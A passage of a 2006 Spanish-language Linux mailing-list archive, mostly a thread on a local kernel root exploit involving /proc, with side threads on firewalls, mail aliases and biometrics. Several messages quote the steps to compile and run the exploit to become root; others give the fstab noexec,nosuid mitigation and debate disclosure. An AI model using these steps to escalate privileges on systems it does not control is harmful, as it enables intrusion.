- Cortafuegos local no es mala idea... aunque no debiera hacer diferencia,
  si el resto esta bien
- Mantenerse al dia con los anuncios de la distro
- Mantener todo /rigurosamente/ al dia.

Si es con Hasefroch, bueno, la idea de un bidon de 200l + cemento + centro
de la bahia se me viene a la mente...
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513
From [EMAIL PROTECTED]  Wed Jul 19 22:21:10 2006
From: [EMAIL PROTECTED] (Horst von Brand)
Date: Wed Jul 19 22:16:55 2006
Subject: alias temporal 
In-Reply-To: Your message of Tue, 18 Jul 2006 13:32:18 -0400.
[EMAIL PROTECTED] 
Message-ID: [EMAIL PROTECTED]

Victor Hugo dos Santos [EMAIL PROTECTED] wrote:
 Existe alguna manera de crear alias de correos temporales ??? que
 sirvan solamente por un correo ???
 
 digamos que quiero tener un alias [EMAIL PROTECTED] por ejemplo y
 que estes solamente reciba un correo y que lo reenvie a
 [EMAIL PROTECTED] y que luego despues de esto ya no exista mas.

Para que diantres quieres hacer esto?!

Seguramente /hay/ opciones de solucion para tu problema.
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513


aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Juan Ponce R
El mié, 19-07-2006 a las 19:14 -0400, Juan Martínez escribió:
 Felipe Tornvall escribió:
  hola lista arreglar fstab
  
  proc/proc   procdefaults0   0
  
  agregarlo a la primera linea si ya esta... no hay de q preocuparse
  prueba:
  crear archivo de 100 mg enb la home del user
  yes  xxx
  luego compilar
  gcc -o archivo source.c
  ejecutar
  ./archivo xxx
  y listo !! estas como root
 
 http://www.debian.org/security/2006/dsa-
 
 Esto es exclusivamente para la rama del kernel 2.6.8.
 
 El lunes, al hacer diariamente apt-get update  apt-get dist-upgrade, 
 me di cuenta que se descargo kernel-image-2.6.8. Luego mire en los 
 avisos de seguridad de debian de que se trataba...
 
 De todas maneras la recomendacion es cambiar en la linea de /etc/fstab 
 de proc, defaults por noexec nosuid.
 
 Es buena idea mandar el source del exploit por aqui?
 
 Lo digo para no alentar a algun lammer que este entre nosotros...


Tengo gentoo Linux con kernel 2.6.17 y en fstab tengo la linea:

proc   /proc   proc   defaults  0   0


y el exploit funciono :S


aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Horst von Brand
Juan Martínez [EMAIL PROTECTED] wrote:
 Felipe Tornvall escribió:
  hola lista arreglar fstab
  proc/proc   procdefaults0   0
  agregarlo a la primera linea si ya esta... no hay de q
  preocuparse
  prueba:
  crear archivo de 100 mg enb la home del user
  yes  xxx
  luego compilar
  gcc -o archivo source.c
  ejecutar
  ./archivo xxx
  y listo !! estas como root
 
 http://www.debian.org/security/2006/dsa-
 
 Esto es exclusivamente para la rama del kernel 2.6.8.

Algo asi como = 2.6.8
 De todas maneras la recomendacion es cambiar en la linea de /etc/fstab
 de proc, defaults por noexec nosuid.

O usar SELinux (es la razon que dan en Fedora para no actualizar el nucleo
(aun, hay mas pifias encoladas...))

 Es buena idea mandar el source del exploit por aqui?

Si. Asi puedes verificar si el problema te afecta o no.

 Lo digo para no alentar a algun lammer que este entre nosotros...

Crees que esa clase de debiles mentales no tienen mecanismos mas expeditos
para obtener estas gracias?
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513
From [EMAIL PROTECTED]  Wed Jul 19 23:25:17 2006
From: [EMAIL PROTECTED] (Carlos Massoglia)
Date: Wed Jul 19 23:20:43 2006
Subject: aviso de seguridad - importante ver EXPLOIT adjunto
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Felipe Tornvall wrote:
 hola lista arreglar fstab
 
 
 
 proc/proc   procdefaults0   0
 
 agregarlo a la primera linea si ya esta... no hay de q preocuparse
 prueba:
 crear archivo de 100 mg enb la home del user
 yes  xxx
 luego compilar
 gcc -o archivo source.c
 ejecutar
 ./archivo xxx
 y listo !! estas como root

Por acá OpenSuSe 10.1 kernel 2.6.16.13-4 también funciona el exploit :S

-- 
Carlos Massoglia L.
   [EMAIL PROTECTED]
   [EMAIL PROTECTED]
 Ing. Informática
   U.T.F.S.M
   Valparaíso - Chile
From [EMAIL PROTECTED]  Wed Jul 19 23:54:26 2006
From: [EMAIL PROTECTED] (Horst von Brand)
Date: Wed Jul 19 23:50:00 2006
Subject: Dispositivos biometricos 
In-Reply-To: Your message of Wed, 19 Jul 2006 09:08:48 -0400.
[EMAIL PROTECTED] 
Message-ID: [EMAIL PROTECTED]

Carlos A. Sepulveda M. [EMAIL PROTECTED] wrote:
 Felipe Tornvall wrote:
  yo estuve viendo unos sitios en usa que venden articulos con tec
  bio, que dispositivo buscas? podrias ser mas especifico ? 
  ocular.. digital con bd...

 digital, con que mande la imagen me basta.

Cuidado, lo de biometria tiene el serio problema que revocar una password
es como bien dificil... Hay que tener precauciones para que no se puedan
filtrar los datos del caso.
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513
From [EMAIL PROTECTED]  Wed Jul 19 23:56:39 2006
From: [EMAIL PROTECTED] (Hugo Figueroa R.)
Date: Thu Jul 20 00:52:12 2006
Subject: aviso de seguridad - importante ver EXPLOIT adjunto
In-Reply-To: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

esconder un problema es lo peor que se puede hacer, al
ser publico las soluciones llegan mas rapido.

Slds.
 --- Juan Martínez [EMAIL PROTECTED] escribió:

 Felipe Tornvall escribió:
  hola lista arreglar fstab
  
  proc/proc   procdefaults  
  0   0
  
  agregarlo a la primera linea si ya esta... no
 hay de q preocuparse
  prueba:
  crear archivo de 100 mg enb la home del user
  yes  xxx
  luego compilar
  gcc -o archivo source.c
  ejecutar
  ./archivo xxx
  y listo !! estas como root
 
 http://www.debian.org/security/2006/dsa-
 
 Esto es exclusivamente para la rama del kernel
 2.6.8.
 
 El lunes, al hacer diariamente apt-get update 
 apt-get dist-upgrade, 
 me di cuenta que se descargo kernel-image-2.6.8.
 Luego mire en los 
 avisos de seguridad de debian de que se trataba...
 
 De todas maneras la recomendacion es cambiar en la
 linea de /etc/fstab 
 de proc, defaults por noexec nosuid.
 
 Es buena idea mandar el source del exploit por aqui?
 
 Lo digo para no alentar a algun lammer que este
 entre nosotros...
 
 -- 
 Juan Martinez G.
 Departamento de Informatica
 Universidad Miguel de Cervantes
 


__
Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam ¡gratis! 
Regístrate ya - http://correo.espanol.yahoo.com/ 
From [EMAIL PROTECTED]  Wed Jul 19 22:28:14 2006
From: [EMAIL PROTECTED] (Enrique Herrera Noya)
Date: Thu Jul 20 01:10:08 2006
Subject: =?iso-8859-1?q?detalles_con_kde=2C_terminando_una_remasterizacio?=